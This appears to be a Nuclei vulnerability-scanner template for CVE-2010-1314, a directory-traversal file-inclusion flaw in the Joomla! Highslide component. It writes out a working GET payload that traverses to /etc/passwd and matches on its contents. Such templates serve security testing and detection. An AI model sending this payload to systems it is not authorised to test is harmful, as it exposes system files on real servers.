28 lines
802 B
YAML
28 lines
802 B
YAML
|
id: CVE-2010-1314
|
||
|
|
||
|
info:
|
||
|
name: Joomla! Component Highslide 1.5 - Local File Inclusion
|
||
|
author: daffainfo
|
||
|
severity: high
|
||
|
description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||
|
reference: |
|
||
|
- https://www.exploit-db.com/exploits/12086
|
||
|
- https://www.cvedetails.com/cve/CVE-2010-1314
|
||
|
tags: cve,cve2010,joomla,lfi
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|